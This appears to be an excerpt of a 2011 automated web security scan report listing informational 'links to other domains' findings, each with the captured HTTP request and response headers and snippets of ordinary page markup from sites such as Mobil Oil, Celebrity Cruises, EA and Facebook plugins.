<td bgcolor="#cccccc"><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" height="1" width="180"></td>
...[SNIP]...
<td><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" height="1" width="7"></td>
<td valign="top"><img src="http://www.mobiloil.com/images/lnav_arrow.gif" alt="" border="0" height="14" width="6"></td>
<td><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" height="1" width="5"></td>
<td valign="top" width="154"><a href="http://www.mobiloil.com/USA-English/MotorOil/Oils/Motorcycle_Oils.aspx" class="lnavItem">MOBIL 1 RACING 4T 10W-40 AND MOBIL 1 V-TWIN 20W-50 MOTORCYCLE OILS</a>
...[SNIP]...
<td bgcolor="#cccccc"><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" height="1" width="180"></td>
...[SNIP]...
<td><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" height="1" width="7"></td><td valign="top"><img src="http://www.mobiloil.com/images/lnav_arrow.gif" alt="" border="0" height="14" width="6"></td><td><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" height="1" width="5"></td><td valign="top" width="154"><a href="http://www.mobiloil.com/USA-English/MotorOil/Oils/Mobil_1_Racing_Oils.aspx" class="lnavItem">RACING OILS</a>
...[SNIP]...
<td bgcolor="#cccccc"><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" height="1" width="180"></td>
...[SNIP]...
<td><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" height="1" width="7"></td><td valign="top"><img src="http://www.mobiloil.com/images/lnav_arrow.gif" alt="" border="0" height="14" width="6"></td><td><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" height="1" width="5"></td><td valign="top" width="154"><a href="http://www.mobiloil.com/USA-English/MotorOil/Oils/Oils_FAQs.aspx" class="lnavItem">FAQS</a>
...[SNIP]...
<td bgcolor="#cccccc"><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" height="1" width="180"></td>
...[SNIP]...
<td><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" height="1" width="7"></td><td valign="top"><img src="http://www.mobiloil.com/images/lnav_arrow.gif" alt="" border="0" height="14" width="6"></td><td><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" height="1" width="5"></td><td valign="top" width="154"><a href="http://www.mobiloil.com/USA-English/MotorOil/Car_Care/Used_Oil_Recycling.aspx" class="lnavItem">USED OIL RECYCLING</a>
...[SNIP]...
<td bgcolor="#cccccc"><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" height="1" width="180"></td>
...[SNIP]...
<td><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" height="1" width="7"></td><td valign="top"><img src="http://www.mobiloil.com/images/lnav_arrow.gif" alt="" border="0" height="14" width="6"></td><td><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" height="1" width="5"></td><td valign="top" width="154"><a href="http://www.mobiloil.com/USA-English/MotorOil/Promotions/Promotions.aspx" class="lnavItem">PROMOTIONS</a>
...[SNIP]...
<td bgcolor="#cccccc"><img src="http://www.mobiloil.com/Images/spacer.gif" alt="" height="1" width="180"></td>
...[SNIP]...
<td class="bodyText" valign="top" align="center">
               <img src="http://www.mobiloil.com/USA-English/MotorOil/Images/Login_Image.gif"alt="Official Motor Oil of NASCAR" border="0"/>
           </td>
...[SNIP]...
<td valign="top"><a href="http://www.mobiloil.com/USA-English/MotorOil/Videos/news_rss_topics.aspx"><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/login_news.gif" alt="Newsfeeds" border="0" width="90"></a><img src="/Images/spacer.gif" width="2"><a href="http://www.facebook.com/mobil1?v=app_4949752878" target="_blank"><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/login_facebook.gif" alt="facebook" border="0"width="90" /></a>
...[SNIP]...
<td valign="top"><a href="http://www.youtube.com/mobil1" target="_blank"><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/login_youtube.gif" alt="YouTube" border="0" width="90" /></a><img src="/Images/spacer.gif" width="2"><a href="http://www.bdasites.com/XOMStore/xtreme_default.asp?xtremeID=3A11D0B1B44946D29AE86F3651A1D236&amp;brandid=mobil1&amp;pl6=B1B4494" target="_blank"><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/login_Mobil1merchandise.gif" alt="Mobil 1 Merchandise" border="0"width="90" /></a>
...[SNIP]...
<td><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/mobil_spacer_bmetal.html" alt="" border="0" height="1" width="5"></td><td valign="top"><a href="http://www.mobiloil.com/USA-English/MotorOil/Rewards/Mobil_1_Rewards.aspx"><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/Promotions/callout_rewards_left.gif" alt="Mobil 1 Rewards" border="0" height="75" width="180"></a>
...[SNIP]...
<td align="RIGHT" class="footerText" bgcolor="#6E6E6E"><a href="http://www.exxonmobil.com" class="footerText" target="_new">ExxonMobil Home</a> | <a href="http://www.mobiloil.com/USA-English/MotorOil/Home/Contact_Us.aspx" class="footerText">Contact Us</a> | <a href="http://www.exxonmobil.com/siteflow/Notices/SF_MS_LegalNotice_TC.asp" class="footerText" target="_new">Privacy &amp; Legal</a>
...[SNIP]...
<td bgcolor="#6E6E6E" class="footerText"><img src="http://www.mobiloil.com/USA-English/MotorOil/images/spacer.gif" width="2" height="15" alt="" border="0" /></td></tr></table><script type="text/javascript" src="http://www.mobiloil.com/USA-English/MotorOil/Imports/webtrends.js"><!-- Stay Open -->
...[SNIP]...
<div><img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="http://www.sdc.exxonmobil.com/dcsvakn9g8s9lijdbimge5rk6_8p6d/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.6.2" /></div>
...[SNIP]...
18.33. http://www.asiawebdirect.com/forms/portal-feedback.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.asiawebdirect.com
Path:   /forms/portal-feedback.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /forms/portal-feedback.html?page=http://www.phuket.com/ HTTP/1.1
Host: www.asiawebdirect.com
Proxy-Connection: keep-alive
Referer: http://phuket.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:36 GMT
Server: Apache/2.2.17
Accept-Ranges: bytes
Content-Length: 27786
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
</head>
<body>


<style>
bo
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.google.com/recaptcha/api/challenge?k=6LfMWLsSAAAAANcknCaRFHJTvQiScySJg3viacWh">
</script>
<noscript>
<iframe src="http://www.google.com/recaptcha/api/noscript?k=6LfMWLsSAAAAANcknCaRFHJTvQiScySJg3viacWh" height="300" width="500" frameborder="0"></iframe>
...[SNIP]...
18.34. http://www.celebritycruises.com/specials/viewHTMLPromo.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebritycruises.com
Path:   /specials/viewHTMLPromo.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /specials/viewHTMLPromo.do?pagename=EuropePromotions&cS=vanity&vanity=EuropePromotion&cid=di_pgr_0601_dr11q2eu_1106_sky HTTP/1.1
Host: www.celebritycruises.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4422256122899399&output=html&h=600&slotname=7706808172&w=120&lmt=1308899798&flash=10.3.181&url=http%3A%2F%2Fwww.phuket-travel.com%2F&dt=1308921743060&bpp=3&shv=r20110615&jsv=r20110616&correlator=1308921743084&frm=4&adk=3252930215&ga_vid=643271157.1308921743&ga_sid=1308921743&ga_hid=1634133515&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&ref=http%3A%2F%2Fwww.phuket.com%2Fislands%2Findex.htm&fu=0&ifi=1&dtd=43&xpc=ynyfOlPgfP&p=http%3A//www.phuket-travel.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en
Vary: Accept-Encoding
Content-Length: 54966
Date: Fri, 24 Jun 2011 13:22:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>

<head>
   

<title>European Cruise Vacations |
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
                   
               
                                                                                                                                                                                                                                                       <a href='http://www.facebook.com/celebritycruises' >
                   <img src="http://media.celebritycruises.com/celebrity/content/en_US/images/homepage/facebook_16.gif" name="related_topic~~1~~icon_image" alt="Facebook" border="0" align="absmiddle"/>
...[SNIP]...
</a>    
               &nbsp;
                   
               
               <a href='http://www.youtube.com/user/CELEBRITYCRUISES#p/p/16EA4FFCE82039C4/0/uLX1sUddLCA&cS=socialMedia2&CID=CEL_10Q3_Web_HP_YouTube' >
                   <img src="http://media.celebritycruises.com/celebrity/content/en_US/images/homepage/youtube_16.gif" name="related_topic~~2~~icon_image" alt="YouTube" border="0" align="absmiddle"/>
...[SNIP]...
</a>    
               &nbsp;
                   
               
               <a href='http://twitter.com/celebrityuk' >
                   <img src="http://media.celebritycruises.com/celebrity/content/en_US/images/homepage/twitter_16.gif" name="related_topic~~3~~icon_image" alt="Twitter" border="0" align="absmiddle"/>
...[SNIP]...
</a>&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;<a href="http://www.azamaraclubcruises.com/home.do?cS=Footer" target="_blank">Azamara Club Cruises</a>
...[SNIP]...
</span> <a href="http://www.cruisingpower.com/?cS=Footer" target="_blank" style="color:#21A3DD;">Cruising Power</a>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2010860;type=2011t872;cat=europ762;ord=1?" width="1" height="1" frameborder="0" style="display:none"></iframe>
...[SNIP]...
18.35. https://www.ea.com/profile/js/facebook.jsx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ea.com
Path:   /profile/js/facebook.jsx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /profile/js/facebook.jsx?ver=1.10.0_en_US HTTP/1.1
Host: www.ea.com
Connection: keep-alive
Referer: https://www.ea.com/profile/register?locale=en_US&surl=http%253A%252F%252Fsupport.ea.com%252Fapp%252Fhome&curl=http%253A%252F%252Fsupport.ea.com%252Fapp%252Fhome&registrationSource=EA-CustomerSupport
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_pv=no%20value; s_cc=true; evar1=Not%20Logged%20In; s_sq=eaeacom%2Ceaproducteacomna%2Ceaeabrandna%2Ceaeacomna%2Ceaproducteacomglobal%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:44:46 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Vary: Accept-Encoding
Content-Length: 8815
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Content-Type: application/javascript

var EAFacebook = new Object();

EAFacebook.fbLinkEAButtonEnabled = true;
EAFacebook.showMasterId = false;
EAFacebook.successUrl = '/profile/fb-login';

EAFacebook.initFacebookLink = function() {
...[SNIP]...
       beforeSend: function () {
           if (EAFacebook.hasErrors()) {
               return false;
           }
               EAFacebook.fbLinkEAButtonEnabled = false;
               $("#buttonText").html('<img src="https://a248.e.akamai.net/static.ea.com/profile-assets/css/assets/facebox/loading.gif?ver=1.10.0_en_US"/>');
       },
       error: function (textStatus) {
           $("#fbErrorBox .icon").html('The username or password you entered is incorrect.');
               $("#fbErrorBox").show();
               ret
...[SNIP]...
18.36. https://www.ea.com/profile/js/jquery_facebox.jsx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ea.com
Path:   /profile/js/jquery_facebox.jsx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /profile/js/jquery_facebox.jsx?ver=1.10.0_en_US HTTP/1.1
Host: www.ea.com
Connection: keep-alive
Referer: https://www.ea.com/profile/register?locale=en_US&surl=http%253A%252F%252Fsupport.ea.com%252Fapp%252Fhome&curl=http%253A%252F%252Fsupport.ea.com%252Fapp%252Fhome&registrationSource=EA-CustomerSupport
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_pv=no%20value; s_cc=true; evar1=Not%20Logged%20In; s_sq=eaeacom%2Ceaproducteacomna%2Ceaeabrandna%2Ceaeacomna%2Ceaproducteacomglobal%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:44:47 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Vary: Accept-Encoding
Content-Length: 9774
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/*
* Facebox (for jQuery)
* version: 1.2 (05/05/2008)
* @requires jQuery v1.2 or later
*
* Examples at http://famspam.com/facebox/
*
* Licensed under the MIT:
* http://www.opensource.org/lic
...[SNIP]...
<a href="#" class="close"> \
<img src="https://a248.e.akamai.net/static.ea.com/profile-assets/css/assets/facebox/closelabel.gif?ver=1.10.0_en_US" title="close" class="close_image" /> \
</a>
...[SNIP]...
18.37. https://www.ea.com/profile/register  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ea.com
Path:   /profile/register

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /profile/register?locale=en_US&surl=http%253A%252F%252Fsupport.ea.com%252Fapp%252Fhome&curl=http%253A%252F%252Fsupport.ea.com%252Fapp%252Fhome&registrationSource=EA-CustomerSupport HTTP/1.1
Host: www.ea.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_pv=no%20value; s_cc=true; evar1=Not%20Logged%20In; s_sq=eaeacom%2Ceaproducteacomna%2Ceaeabrandna%2Ceaeacomna%2Ceaproducteacomglobal%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:44:44 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
P3P: CP="CAO PSA OUR"
Vary: Accept-Encoding
Content-Length: 10092
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link rel="shortcut icon" href="/favicon.ico" />

<link rel="stylesheet" type="text/css" media="screen" href="https://a248.e.akamai.net/static.ea.com/profile-assets/css/reset.css?ver=1.10.0_en_US" />
<link rel="stylesheet" type="text/css" media="screen" href="https://a248.e.akamai.net/static.ea.com/profile-assets/css/utils.css?ver=1.10.0_en_US" />
<link rel="stylesheet" type="text/css" media="screen" href="https://a248.e.akamai.net/static.ea.com/profile-assets/css/layout.css?ver=1.10.0_en_US" />
<link rel="stylesheet" type="text/css" media="screen" href="https://a248.e.akamai.net/static.ea.com/profile-assets/css/gui.css?ver=1.10.0_en_US" />
<link rel="stylesheet" type="text/css" media="screen" href="https://a248.e.akamai.net/static.ea.com/profile-assets/css/typography.css?ver=1.10.0_en_US" />
<link rel="stylesheet" type="text/css" media="screen" href="https://a248.e.akamai.net/static.ea.com/profile-assets/css/register.css?ver=1.10.0_en_US" />
<link rel="stylesheet" type="text/css" media="screen" href="https://a248.e.akamai.net/static.ea.com/profile-assets/css/base/js-dependant/jquery-facebox.css?ver=1.10.0_en_US" />
<!--[if IE 8]>
...[SNIP]...
<body>
<script type="text/javascript" src="https://a248.e.akamai.net/static.ea.com/profile-assets/js/jquery-1.4.2.js?ver=1.10.0_en_US"></script>
...[SNIP]...
</a>
<a href="https://store.playstation.com/external/index.vm?returnURL=http://www.ea.com/profile/psn-login&locale=en_US" id="psn-connect" onclick="window.open (this.href, 'child', 'height=450, width=400');return false;" ><span>
...[SNIP]...
<div id="promo">
<img width="182" height="61" src="https://a248.e.akamai.net/static.ea.com/profile-assets/images/logo-origin-transparent.png?ver=1.10.0_en_US" /> <h2>
...[SNIP]...
<a rel="nofollow" href="http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC"><img src="https://a248.e.akamai.net/static.ea.com/US/portal/images/TrustELogo.jpg?ver=1.10.0_en_US" alt="TRUSTe Certified Site"/></a>
...[SNIP]...
<!-- /regLoginWrap -->
<script type="text/javascript" src="https://a248.e.akamai.net/static.ea.com/profile-assets/js/Framework.js?ver=1.10.0_en_US"></script>
<script type="text/javascript" src="https://a248.e.akamai.net/static.ea.com/profile-assets/js/jquery.checkbox.js?ver=1.10.0_en_US"></script>
<script type="text/javascript" src="https://a248.e.akamai.net/static.ea.com/profile-assets/js/jquery.dynamic-drop.js?ver=1.10.0_en_US"></script>
<script type="text/javascript" src="https://a248.e.akamai.net/static.ea.com/profile-assets/js/jquery.validate-1.7.js?ver=1.10.0_en_US"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://a248.e.akamai.net/static.ea.com/profile-assets/js/signin.js?ver=1.10.0_en_US"></script>
...[SNIP]...
18.38. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.pymnts.com%2Fspil-games-selects-adyens-internet-payment-system-for-global-social-gaming-platform-20110208005240%2F&layout=button_count&show_faces=false&width=100&action=like&font=arial&layout=box_count HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.pymnts.com/spil-games-selects-adyens-internet-payment-system-for-global-social-gaming-platform-20110208005240/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.175.63
X-Cnection: close
Date: Fri, 24 Jun 2011 13:30:36 GMT
Content-Length: 4370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/uBSAkAK-vQA.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/IIeFDzJo603.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/ccPAy08Ly48.js"></script>
...[SNIP]...
18.39. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/like.php?api_key=155079171186702&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df162b01ba%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fphuket.com%2F&layout=standard&locale=en_GB&node_type=link&sdk=joey&show_faces=true&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://phuket.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.1.58
X-Cnection: close
Date: Fri, 24 Jun 2011 13:20:38 GMT
Content-Length: 7909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/uBSAkAK-vQA.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/IIeFDzJo603.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/ulcvK428paE.js"></script>
...[SNIP]...
18.40. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=286893159420&width=250&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/exxon-mobil-fuel-finder/id397136849?mt=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
